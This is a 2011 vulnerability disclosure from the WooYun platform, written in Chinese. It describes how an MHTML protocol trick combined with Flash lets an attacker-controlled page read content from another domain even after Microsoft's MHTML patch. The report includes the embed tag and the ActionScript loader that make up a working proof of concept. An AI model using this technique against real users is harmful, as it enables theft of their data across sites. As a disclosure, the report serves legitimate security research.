当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
漏洞标题:
微软补丁后的MHTML“跨域”漏洞可以利用
相关厂商:
漏洞作者:
提交时间:
2011-04-18 22:36
修复时间:
2011-04-18 22:46
公开时间:
2011-04-18 22:46
漏洞类型:
设计错误/逻辑缺陷
危害等级:
自评Rank:
6
漏洞状态:
未联系到厂商或者厂商积极忽略
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:

>

漏洞详情

披露状态:

2011-04-18: 积极联系厂商并且等待厂商认领中,细节不对外公开
2011-04-18: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

利用第三方插件如flash,仍然可以跨域读数据。个人认为主因还是在于微软,微软mhtml补丁不给力?

详细说明:

假设攻击者可控的网站为evildomain.com,用户存储数据的网站为trusteddomain.com

http://evildomain.com/flash.html,其HTML代码如下:

<embed type="application/x-shockwave-flash" src="mhtml:http://trusteddomain.com/wooyun.jpg!wooyun.swf" allowNetworking=all AllowScriptAccess=samedomain width=500 height=500></embed>


攻击者可控的wooyun.jpg里附加了flash,其as代码大致如下:
var url:String ="http://trusteddomain.com/flash.html";
if(url!=null){
mainText.border = true;
var loader = new URLLoader();
var req = new URLRequest(url);
loader.dataFormat = URLLoaderDataFormat.BINARY;
loader.addEventListener(Event.COMPLETE,getContent);
loader.load(req);
function getContent(event:Event):void
{
var bt:ByteArray = loader.data;
var restext:String = bt.readMultiByte(bt.length,"gb2312");
mainText.text = restext;
}
}
PS:这里为了测试方面,trusteddomain.com和evildomain.com指向同一个网站

漏洞证明:

访问后效果如下:


可见我们可控的flash,读取了http://trusteddomain.com/flash.html的内容。
同样的,攻击者也可以利用该漏洞“绕过”samedomain的限制,就不再列出。
相关请参考http://hi.baidu.com/d4rkwind/blog/item/e01bb6edbeef2320adafd5d2.html

修复方案:

。。。

版权声明:转载请注明来源 latentwind@乌云


>

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)